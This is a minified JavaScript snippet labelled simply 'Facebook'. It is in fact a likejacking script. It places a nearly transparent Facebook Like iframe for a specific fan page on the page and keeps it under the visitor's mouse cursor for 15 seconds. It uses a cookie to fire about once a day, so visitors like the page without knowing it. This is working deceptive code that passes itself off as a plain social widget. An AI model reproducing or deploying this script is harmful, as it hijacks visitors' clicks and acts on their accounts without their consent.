<script type='text/javascript'>
 
//<![CDATA[
 
// Facebook
 
var fan_page_url="<strong>https://www.facebook.com/kitakitau</strong>/",opacity=.01,time=15e3;(document.getElementById&&window.addEventListener||window.attachEvent)&&!function(){function e(e){var t,n;return h?(t=d.pageYOffset,n=d.pageXOffset):(t=d.scrollTop,n=d.scrollLeft),0==e?t:n}function t(t){var n=h?window.pageYOffset:0;t||(t=window.event),"number"==typeof t.pageY?(r=t.pageY-15-n,l=t.pageX-34):(r=t.clientY-16-n,l=t.clientX-36),u.top=r+e(0)+s,u.left=l+s}function n(){u.top=r+e(0)+s,setTimeout(n,300)}function o(){u=document.getElementById("theiframe").style,n()}function i(e){var t=document.cookie,n=t.indexOf(" "+e+"=");if(-1==n&&(n=t.indexOf(e+"=")),-1==n)t=null;else{n=t.indexOf("=",n)+1;var o=t.indexOf(";",n);-1==o&&(o=t.length),t=unescape(t.substring(n,o))}return t}function a(e,t,n){var o=new Date;o.setDate(o.getDate()+n);var i=escape(t)+(null==n?"":"; expires="+o.toUTCString());document.cookie=e+"="+i}var d,m,c=document,r=-10,l=-10,u="",p=(document.getElementsByTagName("div").length,"<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href="+encodeURIComponent(fan_page_url)+"&amp;layout=standard&amp;show_faces=true&amp;width=80&amp;action=like&amp;colorscheme=light&amp;height=30' style='position:absolute;width:53px;height:30px;z-index: 200000;overflow:hidden;border:0;opacity:"+opacity+";filter:alpha(opacity="+100*opacity+");'></iframe>"),f=i("faceLike");null!=f&&""!=f||(a("faceLike","liked",1),document.write(p),m=document.getElementById("theiframe"),document.getElementsByTagName("body")[0].appendChild(m));var s="px",w="number"==typeof window.innerWidth,h="number"==typeof window.pageYOffset;w?d=window:c.documentElement&&"number"==typeof c.documentElement.clientWidth&&0!=c.documentElement.clientWidth?d=c.documentElement:c.body&&"number"==typeof c.body.clientWidth&&(d=c.body),0!=time&&setTimeout(function(){document.getElementsByTagName("body")[0].removeChild(m),window.addEventListener?document.removeEventListener("mousemove",t,!1):window.attachEvent&&document.detachEvent("onmousemove",t)},time),window.addEventListener?(window.addEventListener("load",o,!1),document.addEventListener("mousemove",t,!1)):window.attachEvent&&(window.attachEvent("onload",o),document.attachEvent("onmousemove",t))}();
 
//]]>
 
</script>
